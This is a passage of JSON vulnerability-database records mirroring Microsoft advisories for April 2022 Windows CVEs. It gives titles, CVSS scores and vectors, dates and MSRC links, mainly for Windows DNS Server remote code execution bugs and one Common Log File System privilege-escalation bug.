"https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-24521", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-05-27T14:45:21", "description": "Windows Common Log File System Driver Elevation of Privilege Vulnerability. 
This CVE ID is unique from CVE-2022-24521.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-12T08:00:00", "type": "mscve", "title": "Windows Common Log File System Driver Elevation of Privilege Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-24481", "CVE-2022-24521"], "modified": "2022-04-12T08:00:00", "id": "MS:CVE-2022-24481", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-24481", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-05-27T14:45:17", "description": "Windows DNS Server Remote Code Execution Vulnerability. 
This CVE ID is unique from CVE-2022-24536, CVE-2022-26811, CVE-2022-26812, CVE-2022-26813, CVE-2022-26814, CVE-2022-26815, CVE-2022-26817, CVE-2022-26818, CVE-2022-26819, CVE-2022-26820, CVE-2022-26822, CVE-2022-26823, CVE-2022-26824, CVE-2022-26825, CVE-2022-26826, CVE-2022-26829.", "cvss3": {"exploitabilityScore": 0.7, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 6.6, "vectorString": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-12T08:00:00", "type": "mscve", "title": "Windows DNS Server Remote Code Execution Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 6.8, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 8.5, "vectorString": "AV:N/AC:M/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-24536", "CVE-2022-26811", "CVE-2022-26812", "CVE-2022-26813", "CVE-2022-26814", "CVE-2022-26815", "CVE-2022-26817", "CVE-2022-26818", "CVE-2022-26819", "CVE-2022-26820", "CVE-2022-26821", "CVE-2022-26822", "CVE-2022-26823", "CVE-2022-26824", "CVE-2022-26825", "CVE-2022-26826", "CVE-2022-26829"], "modified": "2022-04-12T08:00:00", "id": "MS:CVE-2022-26821", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-26821", "cvss": {"score": 8.5, "vector": "AV:N/AC:M/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2023-05-27T14:45:17", "description": "Windows DNS Server Remote Code Execution 
Vulnerability. This CVE ID is unique from CVE-2022-24536, CVE-2022-26811, CVE-2022-26812, CVE-2022-26813, CVE-2022-26814, CVE-2022-26815, CVE-2022-26817, CVE-2022-26818, CVE-2022-26819, CVE-2022-26820, CVE-2022-26821, CVE-2022-26823, CVE-2022-26824, CVE-2022-26825, CVE-2022-26826, CVE-2022-26829.", "cvss3": {"exploitabilityScore": 0.7, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 6.6, "vectorString": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-12T08:00:00", "type": "mscve", "title": "Windows DNS Server Remote Code Execution Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 6.8, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 8.5, "vectorString": "AV:N/AC:M/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-24536", "CVE-2022-26811", "CVE-2022-26812", "CVE-2022-26813", "CVE-2022-26814", "CVE-2022-26815", "CVE-2022-26817", "CVE-2022-26818", "CVE-2022-26819", "CVE-2022-26820", "CVE-2022-26821", "CVE-2022-26822", "CVE-2022-26823", "CVE-2022-26824", "CVE-2022-26825", "CVE-2022-26826", "CVE-2022-26829"], "modified": "2022-04-12T08:00:00", "id": "MS:CVE-2022-26822", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-26822", "cvss": {"score": 8.5, "vector": "AV:N/AC:M/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2023-05-27T14:45:17", "description": "Windows DNS Server Remote Code 
Execution Vulnerability. This CVE ID is unique from CVE-2022-24536, CVE-2022-26811, CVE-2022-26812, CVE-2022-26813, CVE-2022-26814, CVE-2022-26815, CVE-2022-26817, CVE-2022-26819, CVE-2022-26820, CVE-2022-26821, CVE-2022-26822, CVE-2022-26823, CVE-2022-26824, CVE-2022-26825, CVE-2022-26826, CVE-2022-26829.", "cvss3": {"exploitabilityScore": 0.7, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 6.6, "vectorString": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-12T08:00:00", "type": "mscve", "title": "Windows DNS Server Remote Code Execution Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 6.8, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 8.5, "vectorString": "AV:N/AC:M/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-24536", "CVE-2022-26811", "CVE-2022-26812", "CVE-2022-26813", "CVE-2022-26814", "CVE-2022-26815", "CVE-2022-26817", "CVE-2022-26818", "CVE-2022-26819", "CVE-2022-26820", "CVE-2022-26821", "CVE-2022-26822", "CVE-2022-26823", "CVE-2022-26824", "CVE-2022-26825", "CVE-2022-26826", "CVE-2022-26829"], "modified": "2022-04-12T08:00:00", "id": "MS:CVE-2022-26818", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-26818", "cvss": {"score": 8.5, "vector": "AV:N/AC:M/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2023-05-27T14:45:16", "description": "Windows DNS Server Remote 
Code Execution Vulnerability. This CVE ID is unique from CVE-2022-24536, CVE-2022-26811, CVE-2022-26812, CVE-2022-26813, CVE-2022-26814, CVE-2022-26815, CVE-2022-26817, CVE-2022-26818, CVE-2022-26819, CVE-2022-26820, CVE-2022-26821, CVE-2022-26822, CVE-2022-26823, CVE-2022-26824, CVE-2022-26825, CVE-2022-26829.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 7.2, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-12T08:00:00", "type": "mscve", "title": "Windows DNS Server Remote Code Execution Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-24536", "CVE-2022-26811", "CVE-2022-26812", "CVE-2022-26813", "CVE-2022-26814", "CVE-2022-26815", "CVE-2022-26817", "CVE-2022-26818", "CVE-2022-26819", "CVE-2022-26820", "CVE-2022-26821", "CVE-2022-26822", "CVE-2022-26823", "CVE-2022-26824", "CVE-2022-26825", "CVE-2022-26826", "CVE-2022-26829"], "modified": "2022-04-12T08:00:00", "id": "MS:CVE-2022-26826", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-26826", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2023-05-27T14:45:16", "description": "Windows DNS Server Remote 
Code Execution Vulnerability. This CVE ID is unique from CVE-2022-24536, CVE-2022-26811, CVE-2022-26812, CVE-2022-26813, CVE-2022-26814, CVE-2022-26815, CVE-2022-26817, CVE-2022-26818, CVE-2022-26819, CVE-2022-26820, CVE-2022-26821, CVE-2022-26822, CVE-2022-26823, CVE-2022-26825, CVE-2022-26826, CVE-2022-26829.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 7.2, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-12T08:00:00", "type": "mscve", "title": "Windows DNS Server Remote Code Execution Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-24536", "CVE-2022-26811", "CVE-2022-26812", "CVE-2022-26813", "CVE-2022-26814", "CVE-2022-26815", "CVE-2022-26817", "CVE-2022-26818", "CVE-2022-26819", "CVE-2022-26820", "CVE-2022-26821", "CVE-2022-26822", "CVE-2022-26823", "CVE-2022-26824", "CVE-2022-26825", "CVE-2022-26826", "CVE-2022-26829"], "modified": "2022-04-12T08:00:00", "id": "MS:CVE-2022-26824", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-26824", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2023-05-27T14:45:16", "description": "Windows DNS Server Remote 
Code Execution Vulnerability. This CVE ID is unique from CVE-2022-24536, CVE-2022-26811, CVE-2022-26812, CVE-2022-26813, CVE-2022-26814, CVE-2022-26815, CVE-2022-26817, CVE-2022-26818, CVE-2022-26819, CVE-2022-26820, CVE-2022-26821, CVE-2022-26822, CVE-2022-26823, CVE-2022-26824, CVE-2022-26825, CVE-2022-26826.", "cvss3": {"exploitabilityScore": 0.7, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 6.6, "vectorString": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-12T08:00:00", "type": "mscve", "title": "Windows DNS Server Remote Code Execution Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 6.8, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 8.5, "vectorString": "AV:N/AC:M/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-24536", "CVE-2022-26811", "CVE-2022-26812", "CVE-2022-26813", "CVE-2022-26814", "CVE-2022-26815", "CVE-2022-26817", "CVE-2022-26818", "CVE-2022-26819", "CVE-2022-26820", "CVE-2022-26821", "CVE-2022-26822", "CVE-2022-26823", "CVE-2022-26824", "CVE-2022-26825", "CVE-2022-26826", "CVE-2022-26829"], "modified": "2022-04-12T08:00:00", "id": "MS:CVE-2022-26829", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-26829", "cvss": {"score": 8.5, "vector": "AV:N/AC:M/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2023-05-27T14:45:17", "description": "Windows DNS Server 
Remote Code Execution Vulnerability. This CVE ID is unique from CVE-2022-24536, CVE-2022-26811, CVE-2022-26812, CVE-2022-26813, CVE-2022-26814, CVE-2022-26815, CVE-2022-26817, CVE-2022-26818, CVE-2022-26820, CVE-2022-26821, CVE-2022-26822, CVE-2022-26823, CVE-2022-26824, CVE-2022-26825, CVE-2022-26826, CVE-2022-26829.", "cvss3": {"exploitabilityScore": 0.7, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 6.6, "vectorString": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-12T08:00:00", "type": "mscve", "title": "Windows DNS Server Remote Code Execution Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 6.8, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 8.5, "vectorString": "AV:N/AC:M/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-24536", "CVE-2022-26811", "CVE-2022-26812", "CVE-2022-26813", "CVE-2022-26814", "CVE-2022-26815", "CVE-2022-26817", "CVE-2022-26818", "CVE-2022-26819", "CVE-2022-26820", "CVE-2022-26821", "CVE-2022-26822", "CVE-2022-26823", "CVE-2022-26824", "CVE-2022-26825", "CVE-2022-26826", "CVE-2022-26829"], "modified": "2022-04-12T08:00:00", "id": "MS:CVE-2022-26819", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-26819", "cvss": {"score": 8.5, "vector": "AV:N/AC:M/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2023-05-27T14:45:17", "description": "Windows DNS 
Server Remote Code Execution Vulnerability. This CVE ID is unique from CVE-2022-24536, CVE-2022-26811, CVE-2022-26812, CVE-2022-26813, CVE-2022-26814, CVE-2022-26815, CVE-2022-26817, CVE-2022-26818, CVE-2022-26819, CVE-2022-26821, CVE-2022-26822, CVE-2022-26823, CVE-2022-26824, CVE-2022-26825, CVE-2022-26826, CVE-2022-26829.", "cvss3": {"exploitabilityScore": 0.7, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 6.6, "vectorString": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-12T08:00:00", "type": "mscve", "title": "Windows DNS Server Remote Code Execution Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 6.8, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 8.5, "vectorString": "AV:N/AC:M/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-24536", "CVE-2022-26811", "CVE-2022-26812", "CVE-2022-26813", "CVE-2022-26814", "CVE-2022-26815", "CVE-2022-26817", "CVE-2022-26818", "CVE-2022-26819", "CVE-2022-26820", "CVE-2022-26821", "CVE-2022-26822", "CVE-2022-26823", "CVE-2022-26824", "CVE-2022-26825", "CVE-2022-26826", "CVE-2022-26829"], "modified": "2022-04-12T08:00:00", "id": "MS:CVE-2022-26820", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-26820", "cvss": {"score": 8.5, "vector": "AV:N/AC:M/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2023-05-27T14:45:17", "description": "Windows 
DNS Server Remote Code Execution Vulnerability. This CVE ID is unique from CVE-2022-24536, CVE-2022-26811, CVE-2022-26812, CVE-2022-26813, CVE-2022-26814, CVE-2022-26815, CVE-2022-26818, CVE-2022-26819, CVE-2022-26820, CVE-2022-26821, CVE-2022-26822, CVE-2022-26823, CVE-2022-26824, CVE-2022-26825, CVE-2022-26826, CVE-2022-26829.", "cvss3": {"exploitabilityScore": 0.7, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 6.6, "vectorString": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-12T08:00:00", "type": "mscve", "title": "Windows DNS Server Remote Code Execution Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 6.8, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 8.5, "vectorString": "AV:N/AC:M/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-24536", "CVE-2022-26811", "CVE-2022-26812", "CVE-2022-26813", "CVE-2022-26814", "CVE-2022-26815", "CVE-2022-26817", "CVE-2022-26818", "CVE-2022-26819", "CVE-2022-26820", "CVE-2022-26821", "CVE-2022-26822", "CVE-2022-26823", "CVE-2022-26824", "CVE-2022-26825", "CVE-2022-26826", "CVE-2022-26829"], "modified": "2022-04-12T08:00:00", "id": "MS:CVE-2022-26817", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-26817", "cvss": {"score": 8.5, "vector": "AV:N/AC:M/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2023-05-27T14:45:18", "description": 
"Windows DNS Server Remote Code Execution Vulnerability. This CVE ID is unique from CVE-2022-24536, CVE-2022-26811, CVE-2022-26812, CVE-2022-26813, CVE-2022-26815, CVE-2022-26817, CVE-2022-26818, CVE-2022-26819, CVE-2022-26820, CVE-2022-26821, CVE-2022-26822, CVE-2022-26823, CVE-2022-26824, CVE-2022-26825, CVE-2022-26826, CVE-2022-26829.", "cvss3": {"exploitabilityScore": 0.7, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 6.6, "vectorString": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-12T08:00:00", "type": "mscve", "title": "Windows DNS Server Remote Code Execution Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 6.8, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 8.5, "vectorString": "AV:N/AC:M/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-24536", "CVE-2022-26811", "CVE-2022-26812", "CVE-2022-26813", "CVE-2022-26814", "CVE-2022-26815", "CVE-2022-26817", "CVE-2022-26818", "CVE-2022-26819", "CVE-2022-26820", "CVE-2022-26821", "CVE-2022-26822", "CVE-2022-26823", "CVE-2022-26824", "CVE-2022-26825", "CVE-2022-26826", "CVE-2022-26829"], "modified": "2022-04-12T08:00:00", "id": "MS:CVE-2022-26814", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-26814", "cvss": {"score": 8.5, "vector": "AV:N/AC:M/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2023-05-27T14:45:16", 
"description": "Windows DNS Server Remote Code Execution Vulnerability. This CVE ID is unique from CVE-2022-24536, CVE-2022-26811, CVE-2022-26812, CVE-2022-26813, CVE-2022-26814, CVE-2022-26815, CVE-2022-26817, CVE-2022-26818, CVE-2022-26819, CVE-2022-26820, CVE-2022-26821, CVE-2022-26822, CVE-2022-26823, CVE-2022-26824, CVE-2022-26826, CVE-2022-26829.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 7.2, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-12T08:00:00", "type": "mscve", "title": "Windows DNS Server Remote Code Execution Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-24536", "CVE-2022-26811", "CVE-2022-26812", "CVE-2022-26813", "CVE-2022-26814", "CVE-2022-26815", "CVE-2022-26817", "CVE-2022-26818", "CVE-2022-26819", "CVE-2022-26820", "CVE-2022-26821", "CVE-2022-26822", "CVE-2022-26823", "CVE-2022-26824", "CVE-2022-26825", "CVE-2022-26826", "CVE-2022-26829"], "modified": "2022-04-12T08:00:00", "id": "MS:CVE-2022-26825", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-26825", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2023-05-27T14:45:16", 
"description": "Windows DNS Server Remote Code Execution Vulnerability. This CVE ID is unique from CVE-2022-24536, CVE-2022-26811, CVE-2022-26812, CVE-2022-26813, CVE-2022-26814, CVE-2022-26815, CVE-2022-26817, CVE-2022-26818, CVE-2022-26819, CVE-2022-26820, CVE-2022-26821, CVE-2022-26822, CVE-2022-26824, CVE-2022-26825, CVE-2022-26826, CVE-2022-26829.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 7.2, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-12T08:00:00", "type": "mscve", "title": "Windows DNS Server Remote Code Execution Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-24536", "CVE-2022-26811", "CVE-2022-26812", "CVE-2022-26813", "CVE-2022-26814", "CVE-2022-26815", "CVE-2022-26817", "CVE-2022-26818", "CVE-2022-26819", "CVE-2022-26820", "CVE-2022-26821", "CVE-2022-26822", "CVE-2022-26823", "CVE-2022-26824", "CVE-2022-26825", "CVE-2022-26826", "CVE-2022-26829"], "modified": "2022-04-12T08:00:00", "id": "MS:CVE-2022-26823", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-26823", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2023-05-27T14:45:23", 
"description": "Windows DNS Server Remote Code Execution Vulnerability. This CVE ID is unique from CVE-2022-24536, CVE-2022-26811, CVE-2022-26813, CVE-2022-26814, CVE-2022-26815, CVE-2022-26817, CVE-2022-26818, CVE-2022-26819, CVE-2022-26820, CVE-2022-26821, CVE-2022-26822, CVE-2022-26823, CVE-2022-26824, CVE-2022-26825, CVE-2022-26826, CVE-2022-26829.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 7.2, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-12T08:00:00", "type": "mscve", "title": "Windows DNS Server Remote Code Execution Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", 